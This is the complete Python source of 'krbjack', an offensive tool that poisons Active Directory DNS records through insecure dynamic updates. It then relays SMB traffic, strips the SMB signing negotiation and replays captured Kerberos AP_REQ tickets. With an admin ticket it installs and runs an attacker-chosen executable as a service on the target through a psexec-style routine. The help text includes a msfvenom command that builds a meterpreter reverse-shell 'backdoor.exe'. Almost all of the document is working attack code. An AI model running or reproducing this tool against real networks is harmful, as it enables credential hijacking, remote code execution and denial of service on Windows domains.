from scapy.layers.smb2 import SMB2_Header, SMB2_Session_Setup_Request
from krbjack.modules.utils import HomeBackedPSEXEC
from impacket.smbconnection import SessionError
from scapy.layers.kerberos import KRB_AP_REQ
from scapy.layers.gssapi import SPNEGO_Token

from .utils import getAuthenticatedImpacketSMBConnection

"""
This module is made to catch AP_REQ on the fly in SMB connections from clients to the
destination target. When AP_REQ is received, it checks if it belongs to a privileged
user on the target. If it is the case, the ticket is used directly to push the chosen
binary on the remote system, creates and starts a service for it.
"""


class Module:
    # This attribute is used to specify a TCP port on which the packets will be checked.
    # The method which determines if packets are interesting will only see packets incoming
    # from this TCP port.
    port = 445
    # This flag is used to decide wether this module has a cleanup() method or not, which
    #   should be called before ending everything.
    # Here we need to uninstall a service because of how psexec works
    requires_cleaning = True

    def __init__(self, args):
        self.service = None

    # The function that must return True of False to indicate wether a packet is supposed
    # "interesting" or not (if it contains an AP_REQ or not for our use case).
    # args:
    #   - peer : the client sending the packet (2-tuple ip, source_port)
    #   - dport: the local port that received the packet (the one the target destination would have
    #       received the packet on)
    #   - data : the packet itself, in raw bytes
    # Return:
    #    The method must return a 2-tuple : bool, self
    #    The boolean indicates if the packet is supposed to be interesting
    #    The second element must be the self object
    def packet_to_catch(self, peer, dport, data):
        # This is where we want to return True if a packet contains an AP_REQ
        ip, sport = peer
        if dport == 445 and data[4:8] == b'\xfeSMB' and data[16:18] == b'\x01\x00':
            pkt = SMB2_Header(data[4:])
            try:
                # Trying to match an SMB2_session setup request with an
                # SPNEGO token which happens to be a Kerberos AP_REQ
                if isinstance(
                    pkt[SMB2_Session_Setup_Request].Buffer[0][1][SPNEGO_Token]
                    .value.root.innerContextToken.root,
                    KRB_AP_REQ
                ):
                    return True, self
            except (KeyError, AttributeError):
                return False, self
        return False, self

    # What runs when an interesting packet is seen:
    # args :
    #   jacker : the KrbJacker instance, with all its arguments
    #   client_ip : the ip of the client sending the interesting packet (2-tuple ip, srcport)
    #   the_packet : the interesting packet
    # must return a bool stating wether or not the attack is successful.
    #   True/successful -> the entire program exits, DNS is set back to normal, forwarding is
    #       stopped ;
    #   False/unsuccessful -> forwarding is set up again, the client is added to
    #       the whitelist of clients not to inspect traffic from.
    def run(self, jacker, client_ip, the_packet):
        if jacker.args.executable is None:
            return False
        print("=== KRB hijacking module ===")
        pkt = SMB2_Header(the_packet[4:])
        # Fetch the AP_REQ
        apreq = (
            pkt[SMB2_Session_Setup_Request].Buffer[0][1][SPNEGO_Token]
            .value.root.innerContextToken.root
        )
        # Display the realm and SPN for the ST
        print(f"\tTicket captured from {client_ip[0]} ! ")
        print(
            f"\trealm : {apreq.ticket.realm.val}, service : "
            f"{apreq.ticket.sname.nameString[0].val}/{apreq.ticket.sname.nameString[1].val}"
        )
        # setting up the impacket SMBConnection from the previously hijacked one
        authenticated_setup_request = pkt[SMB2_Session_Setup_Request]
        gssapi_blob_length = authenticated_setup_request.SecurityLen
        gssapi_blob = the_packet[-gssapi_blob_length:]
        connection = getAuthenticatedImpacketSMBConnection(
            jacker.destination_name, jacker.destination_ip, gssapi_blob
        )
        if connection is None:
            print("\tThe connection could not be hijacked, the stolen ticket didnt work.")
            return False
        # Checking if the user will be able to psexec
        print("\tNow let's see if this ticket belongs to a privileged user ...")
        try:
            connection.listPath("ADMIN$", "/*")
            print("\t=== Admin connection set up !!!")
            print("\t=== Launching home-baked/modified psexec ...")
            # Runs our modified/simpler psexec
            executer = HomeBackedPSEXEC(jacker.args.executable)
            self.service = executer.run(connection)
            if self.service is not None:
                print("\tService installed and running !")
                return True
            else:
                return False
        except SessionError:
            return False

    # This method can be used to clean stuff. It is called if necessary as defined in
    # this class "requires_cleaning" attribute
    def cleanup(self):
        if self.service is not None:
            print("\tUninstalling service ...")
            self.service.uninstall()



from impacket.smb3structs import SMB2_DIALECT_21, SMB2_SESSION_SETUP, SMB2SessionSetup
from impacket.smbconnection import SMBConnection
from impacket.nt_errors import STATUS_SUCCESS
from impacket.smb3 import SessionError
from colorama import Fore

from impacket.examples import serviceinstall
from impacket.dcerpc.v5 import transport
from uuid import uuid4
import logging
import sys


# A method to get an Impcaket SMBConnection object from
# our hijacked gssapi blob containing a service ticket
def getAuthenticatedImpacketSMBConnection(remote_name, remote_destination, gssapi_blob):
    connection = SMBConnection(
        remoteName=remote_name, remoteHost=str(remote_destination), preferredDialect=SMB2_DIALECT_21
    )
    _server = connection.getSMBServer()  # <class 'impacket.smb3.SMB3'>
    sessionSetup = SMB2SessionSetup()
    sessionSetup['Flags'] = 0
    gssapi_blob_length = len(gssapi_blob)
    sessionSetup['SecurityBufferLength'] = gssapi_blob_length
    sessionSetup['Buffer'] = gssapi_blob
    packet = _server.SMB_PACKET()
    packet['Command'] = SMB2_SESSION_SETUP
    packet['Data'] = sessionSetup
    _server._Session['PreauthIntegrityHashValue'] = _server._Connection['PreauthIntegrityHashValue']
    try:
        packetID = _server.sendSMB(packet)
        ans = _server.recvSMB(packetID)
        if ans.isValidAnswer(STATUS_SUCCESS):
            print("\tKerberos auth succeeded :-)")
            _server._Session['SessionID'] = ans['SessionID']
            _server._Session['SigningRequired'] = _server._Connection['RequireSigning']
            _server._Session['Connection'] = _server._NetBIOSSession.get_socket()
            return connection
        else:
            return None
    except SessionError as e:
        print(
            f"{Fore.LIGHTRED_EX}\tSomething went wrong when hijacking the SMB connection :'("
            f"\t{e}{Fore.LIGHTYELLOW_EX}"
        )
        return None


# Our home made psexec. It is basically much simpler that the impacket one
# because we dont need to perform any sort of authentication, and because
# we dont care to get it interactive.
# It can be set up from a custom SMBConnection though, what we need here to
# run it from a hijacked SMB connection obtained through scapy !
class HomeBackedPSEXEC:
    def __init__(self, exeFile):
        self.__exeFile = exeFile
        self.__serviceName = str(uuid4())

    def run(self, connection):
        print("\tHijacking SMB session for DCE transport ...")
        rpctransport = transport.SMBTransport(remoteName=connection.getRemoteName())
        rpctransport.set_smb_connection(connection)
        return self.doStuff(rpctransport)

    def doStuff(self, rpctransport):
        # Sets up the DCE/RPC connection through SMB
        dce = rpctransport.get_dce_rpc()
        try:
            dce.connect()
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
            logging.critical(str(e))
            sys.exit(1)
        global dialect
        dialect = rpctransport.get_smb_connection().getDialect()
        # Copy, install and run the service
        f = open(self.__exeFile, 'rb')
        installService = serviceinstall.ServiceInstall(
            rpctransport.get_smb_connection(), f, self.__serviceName
        )
        print(f"\tInstalling service {self.__serviceName}")
        if installService.install() is False:
            f.close()
            print("\tService installation error :-(")
            return None
        f.close()
        # Returns the service to be able to uninstall it later
        return installService



from threading import Timer


# A Small utility class wrapper around threading.Timer to start
# tasks periodically undefinitely unless asked to stop.
# Use : t = PeriodicTimer(float -> interval, function, *args, **kwargs)
#       f.start()
# The function passed in parameter is called instantly the first time
#   then every n seconds.
# This class is used to perform periodic DNS poisoning.
class PeriodicTimer():
    def __init__(self, seconds, target, *args, **kwargs):
        self._should_continue = False
        self.is_running = False
        self.seconds = seconds
        self.target = target
        self.args = args
        self.kwargs = kwargs
        self.thread = None
        self.is_first = True

    def _handle_target(self):
        self.is_running = True
        self.target(*self.args, **self.kwargs)
        self.is_running = False
        self._start_timer()

    def _start_timer(self):
        if self._should_continue:
            if self.is_first:
                self.thread = Timer(0, self._handle_target)
                self.is_first = False
            else:
                self.thread = Timer(self.seconds, self._handle_target)
            self.thread.start()

    def start(self):
        if not self._should_continue and not self.is_running:
            self._should_continue = True
            self._start_timer()

    def cancel(self):
        if self.thread is not None:
            self._should_continue = False
            self.thread.cancel()



from scapy.pipetool import TransformDrain
from scapy.all import PipeEngine
import socketserver
import threading
import socket

from .custompipes import ConditionDrain, OnMessage, TriggeredTCPConnectPipe


# Serverclass that can be instantiated to forward traffic from a local port to another remote
#   destination. This TCP forward transfers every single packet from the connecting client to a
#   local pipeline which categorizes packets. If the `cond_f` function of the socketserver returns
#   False, the packet is forward to the remote destination. If it returns True, the packet is not
#   forwarded, the entire forwarding is stopped and the thread notifies every other started threads
#   to do so. The packet is then pushed to the main thread through a dedicated Queue.
class TCPForwarder(socketserver.StreamRequestHandler):
    def setup(self):  # method invoked when a client connects
        print(f"--->TCP Forward initiated from {self.client_address} to {self.server.destination}")

        # Method used to check wether a should be forwarded or not:
        def let_client_data_pass(data):
            # Here, server.condition_functions contain a list of functions declared by
            # modules to check wether a packet is interesting.
            for f in self.server.condition_functions:
                r, module = f(self.client_address, self.server.destination[1], data)
                if r:
                    self.server.interesting_packet_queue.put((self.client_address, data, module))
                    self.server.should_stop = True
                    return False
                return True

        # Method used to modify packets on the fly before being sent back to a client.
        # Here some SMB flags are removed to prevent SMB signature to occur when it is supported by
        # both clients and servers but not required.
        def transform_serv_data(data):
            if self.server.destination[1] == 445 and data[0:4] == b'\xfe\x53\4d\x42':
                return data.replace(b'\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a', b'')
            else:
                return data

        # Scapy plumbing to actualy perform the forwarding from a client, to our pipeline of
        # methods :
        #   client -> checkIfPacketIsInteresting -> Server -> modifyServerAnswer -> client
        #                         |
        #                         | contains AP_REQ
        #                         v
        #                       stop everything and notify main thread
        self.dest_pipe = TriggeredTCPConnectPipe(*self.server.destination)
        self.passdrain = OnMessage(lambda pkt: self.request.send(pkt))
        self.transformservdrain = TransformDrain(transform_serv_data)
        is_client_ignored = self.client_address[0] in self.server.ignore_ips
        # small whitelist here
        if not is_client_ignored:
            self.cond_pipe = ConditionDrain(let_client_data_pass)
        else:
            print(f"New connection from ignored ip {self.client_address[0]}")
            self.cond_pipe = ConditionDrain(lambda _: True)
        self.cond_pipe > self.dest_pipe > self.transformservdrain > self.passdrain
        self.pipeline = PipeEngine(self.dest_pipe)
        if not is_client_ignored:
            self.pipeline.add(self.cond_pipe)
        self.pipeline.start()
        self.dest_pipe.on_trigger(b'')
        self.request.setblocking(True)

    def handle(self):  # method invoked when receiving data
        try:
            while not self.server.should_stop:
                data = self.request.recv(65535, socket.SOCK_NONBLOCK)
                if data == b'':
                    break
                self.cond_pipe.push(data)
        except BrokenPipeError:
            self.finish("brokenpipe")
        except ConnectionResetError:
            self.finish("reset by peer")

    def finish(self, reason="client disconnected"):  # method invoked when a client disconnects
        print(f"--->TCP Forward ended for {self.client_address} ({reason})")
        self.pipeline.stop()


# A class to represents a Thread which starts a tcp forwarding server. It it is then possible with
# that to instantiate multiple instances to start forwarding for multiple different ports.
# Initialisation is done with the following arguments :
#   destination (str)   : ip of the server to which forward traffic
#   port (int)          : tcp port to which forward traffic on the destination server (will also be
#                         the port to listen to localy to perform forwarding)
#   packet_queue        : A queue.Queue object in which the first "interesting" packet will be
#                         pushed to.
#   condition_functions : A list of functions used to check wether a packet is interesting.
#                         The functions must return a 2-tuple with the following two informations:
#                              bool : is the packet interesting
#                              object: the module object itself (self) to know which module
#                                      declared the packet interesting
#   ignore_ips          : A set of IPs we dont want to inspect and modify packets. These clients
#                         will have their packets forwarded as-is without inspection.
class TCPForwardThread(threading.Thread):
    def __init__(self, destination, port, packet_queue, condition_functions, ignore_ips):
        threading.Thread.__init__(self)
        self.name = f"TCPForwarderThread-{destination}:{port}"
        socketserver.TCPServer.allow_reuse_address = True
        self.forwarder = socketserver.ThreadingTCPServer(("0.0.0.0", port), TCPForwarder)
        self.forwarder.destination = (str(destination), port)
        self.forwarder.should_stop = False
        self.forwarder.interesting_packet_queue = packet_queue
        self.forwarder.condition_functions = condition_functions
        self.forwarder.ignore_ips = ignore_ips

    def run(self):
        self.forwarder.serve_forever()



from ipaddress import IPv4Network, IPv4Address
from colorama import Fore, Style
from uuid import uuid4
import dns.resolver
import dns.update
import dns.query
import dns.rcode
import importlib
import random
import socket
import queue

from krbjack.tcpforward import TCPForwardThread
from krbjack.utils import PeriodicTimer


class KrbJacker:
    def __init__(self, args, modules):
        self.sub_cmd = args.sub_cmd
        self.args = args
        self.is_poisoning_active = False
        self.forwarders = []
        self.ignore_set = set()
        self.owned = False
        self.available_modules = [importlib.import_module(f"krbjack.modules.{m}") for m in modules]
        self.running_modules = []

        if self.sub_cmd == "check":
            self.domain = args.domain
            self.dc_ip = str(args.dc_ip)
        elif self.sub_cmd == "run":
            self.domain = args.domain
            self.dc_ip = str(args.dc_ip)
            self.destination_name = args.target_name
            self.should_poison = not args.no_poison
            self.ports = args.ports
            # DNS Request to get ip addresses for this target
            try:
                self.original_ips = self.get_dns_record(self.destination_name)
            except dns.resolver.NXDOMAIN:
                print(
                    f"\tIt looks like {Fore.LIGHTRED_EX}something is wrong{Fore.RESET}, the dns "
                    f"server (DC) located at {Fore.LIGHTBLUE_EX}{self.dc_ip}{Fore.RESET} does not "
                    f"look to know the name {Fore.LIGHTBLUE_EX}{self.destination_name}{Fore.RESET}"
                )
                print("\tMaybe you mispelled something ?")
                print("Bye.")
                exit(1)

        # Get our own IP here
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((self.dc_ip, 53))
            self.my_ip = s.getsockname()[0]
            s.close()
        except socket.timeout:
            print(
                Fore.LIGHTRED_EX, f"The DNS server {self.dc_ip} doesnt look to be reachable 🤔.",
                Fore.RESET
            )
            exit(1)

        if self.sub_cmd == "run":
            if args.target_ip:
                self.destination_ip = str(args.target_ip)
            else:
                # Chosing one IP to talk to the target from the ones available
                # Naive scan on tcp 445 to determine which IP to use
                self.destination_ip = None
                for ip in self.original_ips:
                    try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        s.settimeout(3.0)
                        s.connect((ip, 445))
                        s.close()
                        self.destination_ip = ip
                    except (TimeoutError, OSError):
                        continue
                if self.destination_ip is None:
                    print(
                        f"{Fore.LIGHTRED_EX}Something is not right{Fore.RESET}, it looks like you "
                        f"cannot reach any of the IP addresses suggested by the DNS server (the DC)"
                        ".\nMaybe try with the --target-ip option to override this naive detection."
                    )
                    exit(1)

    # Queries DNS to get a list of answers for a typical A query
    def get_dns_record(self, name):
        resolver = dns.resolver.Resolver(configure=False)
        resolver.nameservers = [self.dc_ip]
        answers = resolver.resolve(f"{name}.{self.domain}", "A")
        return [answer.address for answer in answers]

    # Adds a single record A for this (name, ip)
    def add_dns_record(self, record_name, ip):
        add = dns.update.Update(f"{self.domain}.")
        add.add(record_name, 300, "A", ip)
        response = dns.query.tcp(add, self.dc_ip, timeout=10)
        return response.rcode()

    # Removes all records with the given name
    def del_dns_record(self, record_name):
        delete = dns.update.Update(f"{self.domain}.")
        delete.delete(record_name)
        response = dns.query.tcp(delete, self.dc_ip, timeout=10)
        return response.rcode()

    # Returns wether the main domain zone is vulnerable to a DNS record poisoning
    def check(self):
        # to check, we try to add a random record and see if it works
        # Generation of a random RFC1918 private IPv4 address
        networks = [
            IPv4Network("10.0.0.0/8"), IPv4Network("192.168.0.0/16"), IPv4Network("172.16.0.0/12")
        ]
        network = random.choice(networks)
        name = str(uuid4())
        ip = IPv4Address(
            random.randrange(
                int(network.network_address) + 1, int(network.broadcast_address) - 1
            )
        )
        response = self.add_dns_record(name, str(ip))
        if response == dns.rcode.NOERROR:
            self.del_dns_record(name)
            return True
        else:
            return False

    def run(self):
        is_poisonable = self.check()
        if self.sub_cmd == "check":
            print(
                "Check mode : no poisoning will be done, no man-in-the-middle made nor any "
                "side-effect inducing actions."
            )
            if is_poisonable:
                print("\t", Fore.GREEN, Style.BRIGHT, "This domain IS vulnerable.")
            else:
                print(Fore.RED, Style.BRIGHT, "This domain IS NOT vulnerable")
            print(Style.RESET_ALL, Fore.RESET, end="")
            exit(0)
        if not is_poisonable and self.should_poison:
            print(
                "The domain is not vulnerable to DNS records poisoning. If you found another way"
                " to intercept traffic anyway, you can add the --no-poison flag. Else, you're "
                "doomed 🤷."
            )
            exit(0)
        print("Running all the stuff, you can ctrl+c ONCE to stop everything.")
        print(
            "If you kill everything mid attack you take the risk to leave a "
            "DNS poisoning up leading to a complete denial of service"
        )
        print("---")
        interesting_packet_queue = queue.Queue()
        # Creation of TCP forwarder threads, one for each port we want to pipe with the target
        # destination

        # Starts TCP Forwardig
        def false(*args):
            return False, False
        try:
            # For each port to forward
            for dport in self.ports:
                functions = []
                # We check if a module has a method to catch packets on this port
                for module in self.available_modules:
                    m = module.Module(self.args)
                    # If it is the case, we add the function to check packets
                    # to the list of functions to catch interesting packets
                    if dport == m.port:
                        self.running_modules.append(m)
                        functions.append(m.packet_to_catch)
                # If no module matches a port of interest, the default function
                # is "false" upper here and just returns false all the time.
                if not functions:
                    functions.append(false)
                print(
                    f"{Fore.LIGHTBLACK_EX}Starting forwarder 0.0.0.0:{dport}<->"
                    f"{self.destination_ip}:{dport} ...{Fore.RESET}"
                )
                self.forwarders.append(
                    TCPForwardThread(
                        self.destination_ip, dport, interesting_packet_queue,
                        functions, self.ignore_set
                    )
                )
        except PermissionError:
            print(f"Cant do that without admin rights, port {dport} is privileged/<1024.")
            exit(1)
        # Start TCP forwarders in background
        for forwarder in self.forwarders:
            forwarder.start()
        print(f"{Fore.LIGHTBLACK_EX}Forwarders started and enabled.{Fore.RESET}")
        if self.should_poison:
            print(f"{Fore.LIGHTBLACK_EX}Starting periodic DNS poisoning...{Fore.RESET}")
            self.poison_timer = PeriodicTimer(
                10, self.poison
            )
            self.poison_timer.start()
            self.is_poisoning_active = True
        while not self.owned:
            print("--- --- Now waiting for clients --- ---")
            # Now we wait for interesting packes. Queue.get() is blocking.
            # Then we can extract the interesting packet from the Queue shared by all forwarders
            # The module variable contains the module object that sent the packet to the queue
            client_ip, the_packet, the_module = interesting_packet_queue.get()
            # We then run the module who found the packet interesting
            print(Fore.LIGHTYELLOW_EX, end="")
            self.owned = the_module.run(self, client_ip, the_packet)
            print(Fore.RESET, end="")
            if not self.owned:
                self.ignore_set.add(client_ip[0])
                print(f"Added {client_ip[0]} to ignore set.")
            else:
                print(f"{Fore.GREEN} === OWNED ==={Fore.RESET}")
        # Here the attack is finished and was successful, poisoning must be stopped
        if self.is_poisoning_active:
            self.unpoison()
        self.stop_forwarding()

    def stop_forwarding(self):
        for forwardThread in self.forwarders:
            forwardThread.forwarder.socket.close()
            forwardThread.forwarder.shutdown()

    def unpoison(self):
        self.poison_timer.cancel()
        self.poison_timer.thread.join()
        print(f"Restauring DNS records correctly : A {self.destination_name} {self.original_ips}")
        # delete our poison record
        self.del_dns_record(self.destination_name)
        # add one record for each original_ip
        for ip in self.original_ips:
            self.add_dns_record(self.destination_name, ip)
        self.is_poisoning_active = False
        print(f"\t... {Fore.LIGHTGREEN_EX}Done{Fore.RESET}, DNS records are okay now")

    def poison(self):
        # Check first if it is necessary to poison again
        answers = self.get_dns_record(self.destination_name)
        if len(answers) == 1 and answers[0] == self.my_ip:
            return
        else:
            # Then if necessary :
            #   delete all records pointing to self.destination_name
            self.del_dns_record(self.destination_name)
            #   add one record pointing to us
            print(
                f"{Fore.LIGHTBLACK_EX}Poisoning ... : A {self.destination_name}"
                f" -> {self.my_ip}{Fore.RESET}"
            )
            self.add_dns_record(self.destination_name, self.my_ip)



# Description:
#   A set of custom scapy pipes to overcome some lacking features
#   in the available ones.

from scapy.all import Drain, Source
import socket


# A custom drain to perform a task when triggered.
# Takes a function in argument to be run when triggered.
class OnTriggered(Drain):
    def __init__(self, f, *args, name=None, **kwargs):
        super().__init__(name)
        self.f = f
        self.args = args
        self.kwargs = kwargs

    def on_trigger(self, trg):
        return self.f(trg, *self.args, **self.kwargs)


# A custom drain to perform a task when receiving a message
# on low or high inputs.
# Takes a function as argument to be run when a message is received.
# The function takes one argument, which will be the message received.
class OnMessage(Drain):
    def __init__(self, f, *args, name=None, **kwargs):
        super().__init__(name)
        self.f = f
        self.args = args
        self.kwargs = kwargs

    def push(self, msg):
        self.f(msg, *self.args, **self.kwargs)
        self._send(msg)

    def high_push(self, msg):
        self.f(msg, *self.args, **self.kwargs)
        self._high_send(msg)


# A custom drain to filter messages received. When it receives
# a message, it evaluates a condition against it to decide wether
# it should forward it or not.
# Take a function as argument. This function takes the message as an
# argument and must return True or False to decides wether this message
# can be forwarded or not.
class ConditionDrain(Drain):
    """Pass messages when a condition is met
    .. code::
         +-------------+
      >>-|-[condition]-|->>
         |             |
       >-|-[condition]-|->
         +-------------+
    """
    def __init__(self, f, name=None):
        Drain.__init__(self, name=name)
        self.f = f

    def push(self, msg):
        if self.f(msg):
            self._send(msg)

    def high_push(self, msg):
        if self.f(msg):
            self._high_send(msg)


# Just like TCPConnectPipe though it does not connect to the destination
# at creation but only when triggered.
class TriggeredTCPConnectPipe(Source):
    """Exactly like a TCPConnectPipe but only connects to its destination when
        triggered and not before.
    .. code::
         +------^------+
      >>-|             |->>
         |             |
       >-|-[ message ]-|->
         +------^------+
    """
    __selectable_force_select__ = True

    def __init__(self, addr="", port=0, name=None):
        Source.__init__(self, name=name)
        self.addr = addr
        self.port = port
        self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connected = False

    def start(self):
        ...  # wait for trigger

    def on_trigger(self, data):
        self.fd.connect((self.addr, self.port))
        self.connected = True

    def stop(self):
        if self.fd and self.connected:
            self.fd.close()
            self.connected = False

    def push(self, msg):
        self.fd.send(msg)

    def fileno(self):
        return self.fd.fileno()

    def deliver(self):
        if self.connected:
            try:
                msg = self.fd.recv(65536)
            except (socket.error, ValueError, ConnectionResetError):
                self.stop()
                raise
            if msg:
                self._send(msg)



from colorama import deinit as colorama_deinit
from colorama import init as colorama_init
from ipaddress import IPv4Address
import argparse
import pathlib

from .krbjacker import KrbJacker


class SplitIntArgs(argparse.Action):
    def __call__(self, parser, namespace, values, option_string=None):
        try:
            setattr(namespace, self.dest, [int(x) for x in values.split(',')])
        except ValueError:
            parser.error(
                "Port numbers must be comma-separated integers. Example : 139,445."
            )


def main():
    print(
        """
        ██╗  ██╗██████╗ ██████╗      ██╗ █████╗  ██████╗██╗  ██╗
        ██║ ██╔╝██╔══██╗██╔══██╗     ██║██╔══██╗██╔════╝██║ ██╔╝
        █████╔╝ ██████╔╝██████╔╝     ██║███████║██║     █████╔╝
        ██╔═██╗ ██╔══██╗██╔══██╗██   ██║██╔══██║██║     ██╔═██╗
        ██║  ██╗██║  ██║██████╔╝╚█████╔╝██║  ██║╚██████╗██║  ██╗
        ╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝  ╚════╝ ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝
        A full duplex man-in-the-middle tool to abuse unsecure updates DNS
        configuration on active directory and Kerberos AP_REQ hijacking.
        Please read the README/wiki to understand what you are doing here,
        a DoS is easy to do from there...
        - @almandin
        """
    )
    parser = argparse.ArgumentParser(
        prog="krbjack",
        epilog="Use at your own risk, read the README to know side effects of this tool."
               " - Virgile @almandin"
    )
    subparsers = parser.add_subparsers(required=True, dest="sub_cmd", metavar="command")
    subcommand_check = subparsers.add_parser(
        'check', help="Only check if DNS unsecure updates are possible."
    )
    subcommand_check.add_argument(
        "--domain", type=str, required=True,
        help="The name of the Active Directory domain in use"
    )
    subcommand_check.add_argument(
        "--dc-ip", type=IPv4Address, required=True,
        help="The IP address of the domain controller we want to talk to to perform DNS records"
             " poisoning"
    )
    subcommand_exploit = subparsers.add_parser(
        'run', help="Exploit the DNS insecure update misconfiguration"
    )
    subcommand_exploit.add_argument(
        "--domain", type=str, required=True,
        help="The name of the Active Directory domain in use"
    )
    subcommand_exploit.add_argument(
        "--dc-ip", type=IPv4Address, required=True,
        help="The IP address of the domain controller we want to talk to to perform DNS records"
             " poisoning"
    )
    subcommand_exploit.add_argument(
        "--no-poison", required=False, action="store_true",
        help="Start traffic forwarding and inspection without poisoning DNS records"
    )
    subcommand_exploit.add_argument(
        "--target-name", required=True, type=str,
        help="The Netbios name (without domain name) of the machine you want to attack."
    )
    subcommand_exploit.add_argument(
        "--target-ip", required=True, type=IPv4Address,
        help="The IP address of your target, can be used if it looks complicated to get this"
             " tool choose the right one from the ones listed by the DNS server"
    )
    subcommand_exploit.add_argument(
        "--ports", action=SplitIntArgs, required=True, default=[],
        help="List of TCP ports to forward from the incoming clients to the attacked system."
             " Comma-separated port numbers. Example : 139,445,8080."
    )
    subcommand_exploit.add_argument(
        "--executable", type=pathlib.Path, required=True,
        help=(
            "The executable to push and execute to the remote target. "
            "Can be generated with msfvenom type exe-service. "
            "Example : msfvenom -p windows/x64/meterpreter/reverse_tcp "
            "-f exe-service -o backdoor.exe LHOST=X LPORT=Y. If the executable"
            " is not a service executable, it will still work, though the process"
            " will be killed after a few seconds by windows if it takes too long to"
            " run."
        )
    )
    # Feeling too lazy to implement automatic module detection, they must be listed here
    # for the time being.
    modules = ["krboversmb"]

    args = parser.parse_args()
    colorama_init()
    jacker = KrbJacker(args, modules)
    try:
        jacker.run()  # Stops when target owned
        for m in jacker.running_modules:
            if m.requires_cleaning:
                m.cleanup()
    except KeyboardInterrupt:
        print("Asking children threads to stop ...")
        print("Please wait if you don't want to DoS your target 🙏")
        jacker.stop_forwarding()
        if jacker.is_poisoning_active:
            jacker.unpoison()
        for m in jacker.running_modules:
            if m.requires_cleaning:
                m.cleanup()
    colorama_deinit()
    print("Bye.")


if __name__ == "__main__":
    main()
